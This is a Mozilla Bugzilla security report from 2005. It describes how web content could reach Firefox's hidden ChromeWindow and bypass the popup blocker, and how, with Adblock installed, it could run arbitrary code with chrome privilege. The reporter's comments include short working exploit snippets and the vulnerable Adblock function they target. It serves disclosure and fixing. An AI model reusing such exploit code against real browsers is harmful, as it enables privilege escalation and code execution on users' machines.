Closed
Bug 294799
Opened 20 years ago
Closed 20 years ago
Any_XPCOM_Object.anyFunction.__proto__.__parent__ refers to the invisible blank ChromeWindow
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
FIXED
People
(Reporter: moz_bug_r_a4, Assigned: jst)
References
Details
(Keywords: fixed-aviary1.0.5, fixed1.7.9, Whiteboard: [sg:fix] -fixed by 294795. Bug details embargoed until August 1, 2005)
Attachments
(2 files, 1 obsolete file)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Any_XPCOM_Object.anyFunction.__proto__.__parent__ refers to the invisible blank
ChromeWindow. It is [object ChromeWindow], but its location is "about:blank".
thus, it does *not* have chrome privilege.
There is a exception:
document.open.__proto__.__parent__ refers to document.defaultView
I'm not sure what an attacker can do. but, at least this bug can be used in
order to circumvent the built-in popup blocker.
window.alert.__proto__.__parent__.location =
"javascript:window.open('http://www.mozilla.org/')";
Affected:
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Firefox/1.0+
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518
(Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Thunderbird/1.0.2
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050518 Thunderbird/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Thunderbird/1.0+
Note for Thunderbird:
Content script cannot change ChromeWindow.location and cannot call
ChromeWindow.open()
Note:
Firefox and Thunderbird have critical issue that is similar to this bug.
see Bug 294795.
Reproducible: Always
Steps to Reproduce:
|
Reporter | |
Comment 1•20 years ago
|
||
|
|
Reporter | |
Comment 2•20 years ago
|
||
Sorry, I've tested this testcase with local file (file://). Web pages cannot change ChromeWindow.location.
|
|
Reporter | |
Updated•20 years ago
|
Attachment #184008 -
Attachment is obsolete: true
|
|
Reporter | |
Comment 3•20 years ago
|
||
I've made mistakes. When a page's url is https://, a page cannot change ChromeWindow.location. But, when a page's url is http://, a page *can* change ChromeWindow.location. testcase with http: url http://members.tripod.com/cv6y-mlr8-9hh/ct7f-nm8q/open-test-2.html And, this ChromeWindow is the nsIAppShellService.hiddenDOMWindow.
|
||
Updated•20 years ago
|
Assignee: dveditz → jst
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: blocking1.8b3+
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.5+
Whiteboard: [sg:fix]
|
|
Reporter | |
Comment 4•20 years ago
|
||
>When a page's url is https://, a page cannot change ChromeWindow.location. >But, when a page's url is http://, a page *can* change ChromeWindow.location. Sorry, this is incorrect. my old testcase is subject to same origin policy. page A: http://a.a/a.html page B: http://b.b/b.html After page A changed hiddenDOMWindow.location, page B cannot access properties of hiddenDOMWindow. Content window can call directly hiddenDOMWindow.open(), without side effect. window.blur.__proto__.__parent__.open('http://www.mozilla.org/'); Also, the following is possible. (w.opener is hiddenDOMWindow) w = window.open.__proto__('http://www.mozilla.org/'); If user installed Adblock, this bug allows an attacker to run arbitrary code. If Adblock is installed, hiddenDOMWindow contains Adblock's component. and content window can use functions of Adblock's component. ------ Target code from adblock.jar!/content/component.js: function adblockRemoveSlow(node, wnd, immediate, removalCode) { // use timeout to collapse node - otherwise the reflow-queue doesn't catch it // set style + collapse frameset-cols+rows for frames (if specified) if (immediate) (removalCode) ? eval(removalCode) : (node.style.display = "none"); else { var nodeIndex = adblockNodeIndex(wnd, node); wnd.setTimeout( "var node = window._AdblockObjects["+nodeIndex+"];\ "+ (removalCode ? removalCode : "node.style.display = 'none';") +"\ delete window._AdblockObjects["+nodeIndex+"];", 0); // no content will be loaded } } Exploit code: var code = "alert(location.href + '\\n\\n' + Components.stack);"; window.blur.__proto__.__parent__ .adblockRemoveSlow(null, window, false, code); ------ The string passed as the first argument of |wnd.setTimeout| is evaluated in the context of |wnd|, but it is evaluated with the principal of caller (adblockRemoveSlow) that has chrome privilege. I've confirmed that this exploit code works on: Adblock 0.5.2.039 + Firefox/1.0.4 Adblock 0.5.2.039 + Firefox/1.0+ (2005-05-31-13) Adblock 0.5.2.039 + Mozilla/1.7.8
|
|
Reporter | |
Comment 5•20 years ago
|
||
|
|
Reporter | |
Comment 6•20 years ago
|
||
This requires Adblock installed.
|
||
Updated•20 years ago
|
Whiteboard: [sg:fix] → [sg:fix] -need patch
|
|
||
Updated•20 years ago
|
Whiteboard: [sg:fix] -need patch → [sg:fix] -fixed by 294795
|
|
Reporter | |
Comment 7•20 years ago
|
||
I guess this should not be made public, until Bug 297543 is resolved.
|
Assignee | |
Comment 8•20 years ago
|
||
Marking FIXED now that bug 294795 is fixed.
Status: NEW → RESOLVED
Closed: 20 years ago
Keywords: fixed-aviary1.0.5,
fixed1.7.9
Resolution: --- → FIXED
|
|
||
Comment 9•19 years ago
|
||
Adding distributors
|
|
||
Updated•19 years ago
|
Whiteboard: [sg:fix] -fixed by 294795 → [sg:fix] -fixed by 294795. Bug details embargoed until July 20, 2005
|
|
||
Updated•19 years ago
|
Whiteboard: [sg:fix] -fixed by 294795. Bug details embargoed until July 20, 2005 → [sg:fix] -fixed by 294795. Bug details embargoed until August 1, 2005
|
|
||
Updated•19 years ago
|
Group: security
|
||
Updated•19 years ago
|
Flags: testcase+
|
|
||
Updated•18 years ago
|
Flags: in-testsuite+ → in-testsuite?
You need to log in
before you can comment on or make changes to this bug.
Description
•